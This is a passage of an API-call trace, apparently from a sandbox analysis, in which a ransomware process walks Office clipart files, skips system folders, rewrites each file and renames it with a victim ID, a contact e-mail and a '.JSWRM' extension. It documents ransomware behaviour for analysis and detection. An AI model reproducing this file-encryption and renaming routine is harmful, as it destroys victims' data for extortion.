lstrcmpiW (lpString1="SY01253_.WMF", lpString2=".") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="..") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="...") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="windows") returned -1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="recovery") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="perflogs") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="documents and settings") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="system volume information") returned -1 [0098.468] lstrcmpiW (lpString1="SY01253_.WMF", lpString2="msocache") returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01253_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01253_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01253_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01253_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0098.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0098.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01253_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1930) returned 1 [0098.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x780) returned 0x20c6c0 [0098.469] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x780, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x780, lpOverlapped=0x0) returned 1 [0098.471] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.471] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x780, lpOverlapped=0x0) returned 1 [0098.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0098.471] CloseHandle (hObject=0x314) returned 1 [0098.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0098.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0098.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0098.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0098.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0098.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.472] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01253_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01253_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01253_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01253_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0098.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0098.472] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110ef705, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01462_.WMF", cAlternateFileName="")) returned 1 [0098.472] lstrcmpiW (lpString1="SY01462_.WMF", lpString2=".") returned 1 [0098.472] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="..") returned 1 [0098.472] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="...") returned 1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="windows") returned -1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="recovery") returned 1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="perflogs") returned 1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="documents and settings") returned 1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="system volume information") returned -1 [0098.473] lstrcmpiW (lpString1="SY01462_.WMF", lpString2="msocache") returned 1 [0098.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01462_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01462_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01462_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0098.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01462_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01462_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01462_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0098.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0098.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01462_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.474] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=806) returned 1 [0098.474] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x320) returned 0x20b1f8 [0098.474] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x320, lpOverlapped=0x0) returned 1 [0098.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.475] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x320, lpOverlapped=0x0) returned 1 [0098.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0098.475] CloseHandle (hObject=0x314) returned 1 [0098.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0098.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0098.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0098.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0098.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0098.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0098.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.476] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01462_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01462_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01462_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01462_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0098.477] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01491_.WMF", cAlternateFileName="")) returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2=".") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="..") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="...") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="windows") returned -1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="recovery") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="perflogs") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="documents and settings") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="system volume information") returned -1 [0098.477] lstrcmpiW (lpString1="SY01491_.WMF", lpString2="msocache") returned 1 [0098.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01491_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01491_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01491_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0098.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01491_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01491_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01491_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0098.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0098.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01491_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01491_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.478] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1136) returned 1 [0098.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x230a00 [0098.478] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x470, lpOverlapped=0x0) returned 1 [0098.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.479] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x470, lpOverlapped=0x0) returned 1 [0098.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0098.479] CloseHandle (hObject=0x314) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0098.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0098.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0098.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0098.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0098.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0098.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01491_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01491_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SY01491_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sy01491_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0098.481] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SY01563_.WMF", cAlternateFileName="")) returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2=".") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="..") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="...") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="windows") returned -1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="recovery") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="perflogs") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="documents and settings") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="system volume information") returned -1 [0098.481] lstrcmpiW (lpString1="SY01563_.WMF", lpString2="msocache") returned 1 [0098.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01563_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY01563_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.481] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.481] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01563_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY01563_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 